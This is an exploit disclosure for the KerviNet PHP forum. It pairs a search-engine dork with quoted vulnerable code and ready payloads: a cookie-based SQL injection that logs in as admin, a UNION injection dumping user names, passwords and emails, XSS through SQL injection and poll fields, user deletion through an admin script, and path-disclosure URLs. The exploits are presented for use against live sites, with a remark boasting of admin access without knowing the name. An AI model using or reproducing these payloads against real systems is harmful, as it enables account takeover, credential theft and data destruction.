dork: "Copyright KerviNet" eLwaux(c) 20.06.2009 ## ## ## ## Blind SQLinj /index.php ------------------------------------------------------------------------------------------------- if($_COOKIE['user_enter']=="auto") { $enter_login=$_COOKIE['enter_login']; $enter_parol=$_COOKIE['enter_parol']; $mysql->query("SELECT name, pass, status FROM users WHERE name = '".$enter_login."' AND pass = '".$enter_parol."'"); ------------------------------------------------------------------------------------------------- exploit: COOKIE: user_enter=auto COOKIE: enter_login = abc COOKIE: enter_parol = ' or name = (select name from users where id_user=1) and '1'='1'; sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc' AND pass = '' or name = (select name from users where id_user<10 limit 1) и вы автоматом зайдете под админом, даже не зная его имени (: ## ## ## ## SQLinj /message.php ------------------------------------------------------------------------------------------------- 9: $topic=$_GET['topic']; 18: if($topic) { 69: $mysql->query("SELECT name, viewing, voting, status, top_status, id_forum FROM topics WHERE id_topic = ".$topic); exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users ------------------------------------------------------------------------------------------------- ## ## ## ## SiXSS /message.php exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users ## ## ## ## aXSS /add_voting.php ------------------------------------------------------------------------------------------------- 22: $topic=$_GET['topic']; 61: if($topic) { 66: $forum_edit->add_voting($time, $topic, $v_vopros, $variants); 74: } function add_voting($time, $topic, $v_vopros, $variants) { global $user; global $user_ip; if($user) { global $mysql; $mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic); $mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")"); $id_vname=mysql_insert_id(); for($i=0; $iquery("INSERT INTO v_variants VALUES (".$vr_nom.", '".$variants[$i]."', ".$id_vname.")"); } } return $id_vname; } ------------------------------------------------------------------------------------------------- exploit:/add_voting.php?topic=1 POST: add_voting = ok_add POST: v_vopros = v POST: v_variant1 = {XSS} POST: v_variant2 = v2 ## ## ## ## users deleating /admin/edit_user.php ------------------------------------------------------------------------------------------------- $del_user_id=$_POST['del_user_id']; $mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id); ------------------------------------------------------------------------------------------------- exploit: POST: del_user_id=(select user_id from users limit 1) ## ## ## ## Path Disclosure ------------------------------------------------------------------------------------------------- /include_files/voting_diagram.php /include_files/voting.php /include_files/topics_search.php /include_files/topics_list.php /include_files/top_part.php /include_files/quick_search.php /include_files/quick_reply.php /include_files/moder_menu.php /include_files/messages_list.php /include_files/menu.php /include_files/head.php /include_files/forums_list.php /include_files/forum_statistics.php /include_files/forum_info.php /include_files/birthday.php /admin/head.php -------------------------------------------------------------------------------------------------